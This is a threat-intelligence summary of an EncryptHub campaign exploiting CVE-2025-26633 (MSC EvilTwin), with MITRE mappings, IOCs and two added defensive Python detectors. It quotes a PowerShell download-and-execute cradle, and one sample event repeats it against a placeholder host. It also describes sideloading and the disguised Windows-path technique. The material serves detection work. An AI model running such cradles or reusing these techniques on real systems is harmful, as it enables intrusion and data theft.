Trustwave SpiderLabs details an EncryptHub campaign that combines social engineering, Microsoft Teams-based remote access, and exploitation of CVE-2025-26633 (MSC EvilTwin) to load malicious .msc files and deploy payloads such as Fickle Stealer. The actor also uses two Golang tools (SilentCrystal and a SOCKS5 backdoor) and abuses Brave Support and rivatalk.net hosting for payload delivery and C2 communications. #EncryptHub #CVE-2025-26633
Keypoints
- EncryptHub uses social-engineering calls and Microsoft Teams requests to establish remote sessions and run PowerShell loaders.
- The campaign exploits CVE-2025-26633 (MSC EvilTwin) by placing a malicious .msc in an MUIPath en-US directory so mmc.exe loads it.
- PowerShell runner.ps1 drops two .msc files, replaces an htmlLoaderUrl/URI placeholder with a C2 URL, and retrieves AES-encrypted commands from C2.
- Build.ps1 establishes persistence, exfiltrates system info, and deploys Fickle Stealer to harvest files and crypto wallets.
- New Golang tools include SilentCrystal (abuses Brave Support to host payloads and stages files in a mock “C:\Windows ” directory, with a trailing space so the path resembles the real trusted one) and a SOCKS5 backdoor supporting client and server modes.
- A fake video-call platform (rivatalk.net) hosts a malicious installer (setup.msi) that sideloads userenv.dll and runs pay.ps1 to maintain encrypted C2 communications and hide activity with fake browser traffic.
- Known IOCs and C2 URLs include cjhsbam[.]com, safesurf.fastdomain-uoemathhvq.workers[.]dev, and api.rivatalk[.]net with associated IP 185.33.86.220.
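The keypoints above describe the on-disk shape of the MSC EvilTwin abuse: two .msc files, the one in the en-US subfolder being what mmc.exe actually loads, with a C2 URL written into it by runner.ps1. As an added, offline check (not code from Trustwave or from the campaign), the Python below walks a directory tree for exactly that layout, a .msc in an en-US folder shadowing a same-named .msc in its parent, and reports any URL embedded in the shadowing file. The sample tree, its file names, the XML stub and the URL c2.example.invalid are constructed for the demo; the real console-file structure is not reproduced.

```python
import os
import re
import tempfile
from pathlib import Path

# Any http(s) URL embedded in a console file. The report describes runner.ps1
# writing a C2 URL into the .msc in place of an htmlLoaderUrl placeholder.
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def find_evil_twin_msc(root):
    """Walk `root` and return one finding per en-US\\<name>.msc that shadows a
    same-named <name>.msc in its parent directory (the MSC EvilTwin layout),
    together with any URLs found inside the shadowing file."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        folder = Path(dirpath)
        if folder.name.lower() != "en-us":
            continue
        # Case-insensitive view of the parent directory, as NTFS would resolve it.
        siblings = {p.name.lower(): p for p in folder.parent.iterdir() if p.is_file()}
        for name in filenames:
            if not name.lower().endswith(".msc"):
                continue
            twin = siblings.get(name.lower())
            if twin is None:
                continue  # a localized .msc with no same-named parent is not this layout
            shadow = folder / name
            text = shadow.read_text(encoding="utf-8", errors="ignore")
            findings.append({
                "name": name,
                "shadow": str(shadow),
                "twin": str(twin),
                "urls": URL_RE.findall(text),
            })
    return findings


def build_sample_tree(base):
    """Create a constructed layout for the demo (not a real sample): base\\WF.msc,
    the decoy the user opens, base\\en-US\\WF.msc, the one mmc.exe loads, and a
    localized Other.msc with no twin that must not be flagged."""
    base = Path(base)
    (base / "en-US").mkdir(parents=True, exist_ok=True)
    decoy = '<?xml version="1.0"?><MMC_ConsoleFile><StringTables/></MMC_ConsoleFile>'
    (base / "WF.msc").write_text(decoy, encoding="utf-8")
    # Constructed stand-in for the loader console: a string entry holding the URL
    # that runner.ps1 is reported to substitute for the placeholder.
    shadow = ('<?xml version="1.0"?><MMC_ConsoleFile><StringTables><StringTable><Strings>'
              '<String ID="1">https://c2.example.invalid/loader</String>'
              '</Strings></StringTable></StringTables></MMC_ConsoleFile>')
    (base / "en-US" / "WF.msc").write_text(shadow, encoding="utf-8")
    (base / "en-US" / "Other.msc").write_text(decoy, encoding="utf-8")


def demo():
    """Build the sample tree in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return find_evil_twin_msc(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point `find_evil_twin_msc` at user-writable locations (Downloads, %TEMP%, %APPDATA%) rather than the whole disk; a shadowing pair there, especially one carrying a URL, is the artifact to pull for analysis, while the same layout under System32 is where legitimate localized consoles live.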
MITRE Techniques
- [T1218.014] System Binary Proxy Execution: MMC – CVE-2025-26633 (MSC EvilTwin) makes the signed mmc.exe load a malicious .msc from the MUIPath; nothing public-facing is exploited, the user opens the console file locally. Quote: ‘mmc.exe first checks for a file with the same name in the MUIPath directory. It then loads and executes the malicious MSC file from the en-US directory.’
- [T1566.004] Phishing: Spearphishing Voice and [T1204] User Execution – Actors phone victims posing as IT support, request Microsoft Teams connections to obtain a remote session (remote access tooling, [T1219]), and talk victims into running PowerShell: ‘users receive convincing phone calls from someone posing as an IT support representative’.
- [T1059.001] PowerShell – loaders fetch and execute remote scripts (runner.ps1, build.ps1 and pay.ps1) through a download cradle; quote: “powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ‘Invoke-RestMethod -Uri … | Invoke-Expression’”.
- [T1105] Ingress Tool Transfer – Payloads are hosted and retrieved from external hosting (Brave Support, rivatalk.net, workers.dev): quote: ‘The malware then downloads the file from the provided Brave Support link and extracts its contents.’
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Build.ps1 establishes persistence on the infected machine and maintains continuous communication with C2; the summary describes this only as the persistence mechanism in Build.ps1 and does not say which autostart location is used.
- [T1041] Exfiltration Over C2 Channel – Build.ps1 collects and exfiltrates system information to the EncryptHub C2 and receives AES-encrypted commands over the same channel (also [T1573.001] Encrypted Channel: Symmetric Cryptography): ‘Build.ps1 collects and exfiltrates system information to the EncryptHub C2 server… The script receives AES-encrypted commands from the attacker, decrypts them, and runs the payloads.’
- [T1071.001] Application Layer Protocol: Web Protocols – C2 communications use HTTP/HTTPS endpoints (cjhsbam[.]com, safesurf.fastdomain-uoemathhvq.workers[.]dev, api.rivatalk[.]net) to retrieve payloads and send status; quote: ‘hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1’.
- [T1566] Phishing – a fake video conferencing platform (rivatalk.net) lures victims and requires an access code before the Windows installer can be downloaded: ‘rivatalk.net … impersonate a video conferencing platform … downloading the Windows application requires an access code’.
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – setup.msi drops launcher.exe and an ELAM installer; launcher.exe sideloads a malicious userenv.dll, which then executes the PowerShell payload (pay.ps1): ‘launcher.exe is abused to sideload a malicious DLL.’
- [T1090] Proxy – SOCKS5 Proxy – Golang backdoor implements SOCKS5 tunneling in client and server modes to route traffic and provide C2 connectivity (described as SOCKS5 backdoor).
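Three of the behaviours mapped above leave distinct endpoint telemetry: the PowerShell download cradle, mmc.exe opening a console file from outside System32, and launcher.exe loading userenv.dll from its own directory instead of the system copy. The Python below is an added example, not code from Trustwave or the report, showing that detection logic run over constructed Sysmon-style process-creation (EventID 1) and image-load (EventID 7) records. The field layout, the user paths and the sample command lines are assumptions made for the demo; only the cradle shape quoted in the report, the mmc.exe/.msc pairing and the launcher.exe/userenv.dll pairing come from the page.

```python
import re

# Constructed sample events in a Sysmon-like field layout (EventID 1 = process
# create, EventID 7 = image load). Illustrative records, not captured telemetry.
SAMPLE_EVENTS = [
    {  # 0: benign administrative PowerShell
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    },
    {  # 1: download cradle of the shape quoted in the report (URL is a placeholder)
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command 'Invoke-RestMethod -Uri https://stage.example.invalid/runner.ps1 | Invoke-Expression'",
    },
    {  # 2: mmc.exe opening a console file dropped in a user-writable path
        "EventID": 1,
        "Image": r"C:\Windows\System32\mmc.exe",
        "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Users\alice\AppData\Local\Temp\WF.msc',
    },
    {  # 3: mmc.exe opening the built-in firewall console (benign)
        "EventID": 1,
        "Image": r"C:\Windows\System32\mmc.exe",
        "CommandLine": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\WF.msc',
    },
    {  # 4: launcher.exe loading userenv.dll from its own directory (side-load)
        "EventID": 7,
        "Image": r"C:\Users\alice\AppData\Local\Temp\launcher.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\userenv.dll",
    },
    {  # 5: the genuine userenv.dll loaded from System32 (benign)
        "EventID": 7,
        "Image": r"C:\Windows\System32\svchost.exe",
        "ImageLoaded": r"C:\Windows\System32\userenv.dll",
    },
]

# A cradle is a download primitive piped into an execution primitive.
CRADLE_DOWNLOAD = re.compile(r"\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr|DownloadString)\b", re.I)
CRADLE_EXEC = re.compile(r"\b(Invoke-Expression|iex)\b", re.I)
# Paths under the Windows system directories are treated as expected locations.
SYSTEM_DIRS = re.compile(r"^[A-Z]:\\Windows\\(System32|SysWOW64)\\", re.I)
# A quoted or unquoted drive-letter path ending in .msc on the mmc.exe command line.
MSC_PATH = re.compile(r'"([^"]*\.msc)"|([A-Za-z]:\\[^\s"]*\.msc)', re.I)


def detect(events):
    """Run the three rules over event dicts; return (index, rule_name) pairs that fired."""
    hits = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "")
            image = ev.get("Image", "").lower()
            if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
                if CRADLE_DOWNLOAD.search(cmd) and CRADLE_EXEC.search(cmd):
                    hits.append((i, "powershell_download_cradle"))
            if image.endswith("\\mmc.exe"):
                for m in MSC_PATH.finditer(cmd):
                    path = m.group(1) or m.group(2)
                    if not SYSTEM_DIRS.match(path):
                        hits.append((i, "mmc_console_outside_system32"))
                        break
        elif ev["EventID"] == 7:
            loaded = ev.get("ImageLoaded", "")
            if loaded.lower().endswith("\\userenv.dll") and not SYSTEM_DIRS.match(loaded):
                hits.append((i, "userenv_dll_sideload"))
    return hits


if __name__ == "__main__":
    for index, rule in detect(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```

The mmc.exe rule keys on where the console file sits rather than on its name, because the EvilTwin file reuses a legitimate snap-in name; the side-load rule likewise keys on the DLL path, since the malicious userenv.dll carries the genuine file name by design. Tune the `-ExecutionPolicy Bypass` and `-WindowStyle Hidden` switches in as extra weight if the bare download-and-execute pairing is too noisy in a given environment.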
Indicators of Compromise
- [Domain] C2 and hosting domains – cjhsbam[.]com and rivatalk[.]net (the latter hosts both the fake video platform and C2).
- [Domain] Workers/hosting domain – safesurf.fastdomain-uoemathhvq.workers[.]dev (serves pay.ps1) and api.rivatalk[.]net (C2).
- [IP Address] C2-associated IP – 185.33.86.220 (observed hosting related infrastructure).
- [File/Script] PowerShell loader and payload filenames – runner.ps1, build.ps1, pay.ps1 (used to drop .msc files and retrieve next-stage payloads).
- [File] Installer and binaries – setup.msi, launcher.exe, userenv.dll (sideloaded malicious DLL), WF.msc (the malicious console file reuses the name of the legitimate Windows Defender Firewall snap-in), Fickle Stealer and additional payloads.